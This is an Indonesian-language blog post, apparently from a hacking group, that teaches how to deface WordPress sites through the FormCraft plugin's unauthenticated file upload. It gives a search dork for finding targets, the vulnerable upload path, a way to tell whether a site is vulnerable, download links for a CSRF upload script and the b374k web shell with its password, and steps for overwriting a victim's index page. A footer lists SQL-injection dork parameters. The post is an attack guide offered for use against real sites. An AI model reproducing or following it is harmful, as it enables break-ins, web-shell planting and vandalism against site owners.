Langsung ke konten utama

Deface Website Metode Formcraft

1. Dork ==> intext:powered formcraft site:?? <= TANDA TANYA ini bisa di ganti (com,id,pl,il,us,be,br) terserah anda menurut code negara .
2. exploit ==> /wp-content/plugins/formcraft/file-upload/server/php/upload.php
3. script crsf , (terdapat 2 file , extact dulu ... bisa anda download url ini==> http://www.2beonline.net/sitio/language/csrf-formcraft.zip
4. shell , bisa kalian download di sini ==> http://b374k-shell.googlecode.com/files/b374k-2.8.php
Langsung ajah om :
1. jika kalian punya hosting subdomain gratis atau semacam nya , jika belum punya silahkan daftar dulu di http://000webhost.com , buka hostingan anda lalu masuk ke file manager , public html , lalu upload ke 2 file script crsf nya .. lalu buka crsf nya ..
ket : ( script CRSF itu bebas anda mau taruh/upload dimana , mau di hostingan atau nitip di situs orang juga gapapa )
2.selanjut nya (tab baru) cari target menggunakan dork di atas , setelah ketemu target nya lalu masukkan exploit nya pada url (guna untuk mengetahui Vuln atau Tidak )
contoh url : http://target.com/?page_id=45
menjadi : http://target.com/…/formc…/file-upload/server/php/upload.php
-enter-
ket: (kalo vuln akan keluar tanda nya seperti ini : {"failed":"No file found 2"} kalo tidak / eror itu TIDAK VULN !)
3.copy URL nya contoh : http://target.com/…/formc…/file-upload/server/php/upload.php
lalu pastekan di kolom kotak kecil di script Crsf (yg sudah anda buka melalui hosting anda / upload di situs lain ) lalu klik SUBMIT TARGET
4.lalu muncul tampilan upload , klik browser lalu upload shell kamu yg sudah kamu download di atas atau dengan menggunakan shell kamu sendiri .. lalu klik UPLOAD .
5. dan untuk memanggil /memunculkan shell kalian yg sudah di upload yaitu : /wp-content/plugins/formcraft/file-upload/server/php/files/(nama shell kamu.php)
CONTOH : http://target.com/…/php/files/1548ae45305981---b374k-2.8.php <== yang ini itu nama shell, jadi itu dirubah nama shell kamu yg udah di upload ,
ket: ( nama shell akan ada keterangan nya setelah anda mengupload shell anda )
6.setelah terbuka shell kamu lalu masukkan password nya , kalo shell yg didownload nya di atas itu password nya (b374k) . lalu GO !
setelah masuk , klik public html . cari index.php nya atau index.html nya lalu klik edit (disamping ) , ubah semua script nya dengan script kamu !
lalu klik SAVE !
7. selesai deh bisa kalian check dengan membuka situs nya
ket : (POKOK NYA KALO UDAH MASUK SHELL KALIAN ITU BERARTI KALIAN UDAH MASUK KEDALAM WEBSITE KORBAN , DAN TERSERAH ANDA MAU MELAKUKAN APA , KALO MAU DEFACE YAH UBAH INDEX.HTML NYA / INDEX.PHP NYA , KALO MAU DI PATCH YA SILAHKAN :V CARI DI GOOGLE !! )
Masukkan ringkasan dari om Bebe Qelo ( Cari target pake dork , masukan exploit di link , kalau ada tulisan no file upload . Block and copy link nya . Buka script crsf via notepad , paste di kolom url nya . Trus save as html . Klick 2 kali . Nah sisa upload . Kalo lokasi shell nya seperti yang ente tulis di atas )
SALAM -/\- by majin boo - Cirebon Cyber Crime -

Komentar

Postingan populer dari blog ini

Dork SQL injection Terbaru 2015

ListElement.asp?segid= detail?date= offer_detail.php?oid= item.php?it_id= include_pictures.php?id= recommend.php?item_id= index.php?controller= index.php&limite= pressrelease.php?viewpr= project.asp?id= browse.php?sort= View-Poetry.php?book_id= contacts.php?ofc= reservations.asp?heure= guitartab.asp?idMusica= showthread.php?t= ocasion.php&limite= browse.php?sort= details.asp?ID= view.php?client= comment.php?postid= detailtrip.php?trip_id= video.php?video= mapinfo.asp?map= contorno.php?&offset= street.php?region= vr_viewer.asp?vr_iid= ficha.php?producto= index.php?uid= Listing.SendToCell.asp?Lid= detailnews.php?id= article.php?id= message.php?act= direct_product.php?ID= index.php?id= detalle.php?id= troubleshooting.php?trouble_no= links.asp?gotolink= kom_award.php?page= icons.php?start= group_posts.php?gid= index.php?page= listing.php?listing_id= resultado.php?c= ListInfo.asp?UserID= g...